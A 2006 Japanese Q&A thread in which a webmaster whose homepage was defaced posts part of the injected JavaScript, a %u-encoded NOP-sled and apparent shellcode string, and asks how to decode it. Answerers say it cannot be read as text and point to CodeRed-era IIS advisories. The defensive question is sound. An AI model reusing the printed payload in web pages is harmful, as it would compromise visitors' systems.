HPの書き換えにあったので、改変内容を確認しています。

以下のURLを参考にして追加されたコード(Javascript)を調べたのですが、何が書いてあるのか読めませんでした。
http://www.geocities.jp/masaki030914/masaki/javascript/escape_unescape.html
一部を掲載しますので、解析方法教えていただきたいです。よろしくお願いします。

%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10

回答の条件
  • URL必須
  • 1人1回まで
  • 登録:
  • 終了:2006/07/31 20:00:24
※ 有料アンケート・ポイント付き質問機能は2023年2月28日に終了しました。

ベストアンサー

id:chankaz No.2

回答回数53ベストアンサー獲得回数3

ポイント35pt

> %u9090%u9090......

これって、ワームじゃないでしょうか。


・CERT Advisory CA-2001-19 (和訳)

http://www.reasoning.org/jp/cert/cert2001-19.html

・Index Server ISAPI エクステンションの未チェックのバッファにより Web サーバーが攻撃される問題について

http://www.ipa.go.jp/security/ciadr/vul/200106iisidxsvr.htm


> HPの書き換えにあった

ってことは、感染しているかもしれませんね。

id:negi-taurus

%u9090%u9090......

で調べた時に、CodeRedのページが引っかかっていたので、そうかもしれません。

ご協力をいただきありがとうございました。

2006/07/31 19:57:49

その他の回答1件)

id:abunakunai No.1

回答回数26ベストアンサー獲得回数3

ポイント35pt

http://neko.dosanko.ch/contents/script/tool/convert/index

結論をいうと、日本語でないので読めません。

%u9090

というのはutf-8の文字列で

邐

と等価です。

故に

邐邐࿫...

と置換し、

<html>

<head>

<meta http-equiv="content" content="text/html; charset=UTF-8">

</head>

<body>

&#x9090;&#x9090;&#x0feb;...

</body>

</html>

と簡易に作成したhtmlをIEに放り込んでも、よめない文字がでてくる

だけです。

id:negi-taurus

やっぱり読めないですか…ご協力をいただきありがとうございました。

2006/07/31 19:58:56
id:chankaz No.2

回答回数53ベストアンサー獲得回数3ここでベストアンサー

ポイント35pt

> %u9090%u9090......

これって、ワームじゃないでしょうか。


・CERT Advisory CA-2001-19 (和訳)

http://www.reasoning.org/jp/cert/cert2001-19.html

・Index Server ISAPI エクステンションの未チェックのバッファにより Web サーバーが攻撃される問題について

http://www.ipa.go.jp/security/ciadr/vul/200106iisidxsvr.htm


> HPの書き換えにあった

ってことは、感染しているかもしれませんね。

id:negi-taurus

%u9090%u9090......

で調べた時に、CodeRedのページが引っかかっていたので、そうかもしれません。

ご協力をいただきありがとうございました。

2006/07/31 19:57:49

コメントはまだありません

この質問への反応(ブックマークコメント)

「あの人に答えてほしい」「この質問はあの人が答えられそう」というときに、回答リクエストを送ってみてましょう。

これ以上回答リクエストを送信することはできません。制限について

回答リクエストを送信したユーザーはいません